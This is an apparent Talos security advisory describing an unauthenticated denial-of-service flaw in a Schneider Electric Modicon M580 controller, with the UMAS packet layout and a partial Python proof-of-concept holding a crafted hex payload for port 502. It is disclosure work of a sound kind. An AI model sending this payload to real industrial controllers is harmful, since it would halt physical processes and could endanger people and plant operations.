Talos Vulnerability Report


Schneider Electric Modicon M580 UMAS Function Code 0x29 Denial of Service Vulnerability

August 13, 2019
CVE Number



An exploitable denial of service vulnerability exists in the UMAS function code 0x29 functionality of the Schneider Electric Modicon M580 Programmable Automation Controller firmware version SV2.70. A specially crafted UMAS command can cause the device to enter a non-recoverable fault state, resulting in a complete stoppage of remote communications with the device. An attacker can send unauthenticated commands to trigger this vulnerability.

Tested Versions

Schneider Electric Modicon M580 BMEP582040 SV2.70

Product URLs


CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


CWE-248: Uncaught Exception


The Modicon M580 is the latest in Schneider Electric’s Modicon line of Programmable Automation Controllers. The device boasts a Wurldtech Achilles Level 2 certification and global policy controls to quickly enforce various security configurations. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus, and a management protocol referred to as UMAS.

When a UMAS command is sent using function code 0x29 it is possible to make the device enter a non-recoverable fault state, causing a denial of service condition.

The structure of a malicious function code 0x29 command takes a form similar to the following:

    0   1   2   3   4   5   6   7   8   9   a   b   c   d   e   f
0 | A | B | C |                         D                            
1   <D cont.> |

A --> Modbus Function Code  (0x5a)
B --> Session
C --> UMAS Function Code    (0x29)
D --> Data                  

In the non-recoverable fault state the CPU has entered an error mode where all remote communications have been stopped, process logic stops execution, and the device requires a physical power cycle to regain functionality.

Exploit Proof of Concept

import socket
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    rhost = ""
    rport = 502
    s.connect((rhost, rport))
    msg = "000000000014005a00290000ffff010000000000000000000000".decode('hex')
if __name__ == '__main__':


2019-04-10 - Vendor Disclosure
2019-08-13 - Vendor Patched; Public Release


Discovered by Jared Rittle of Cisco Talos.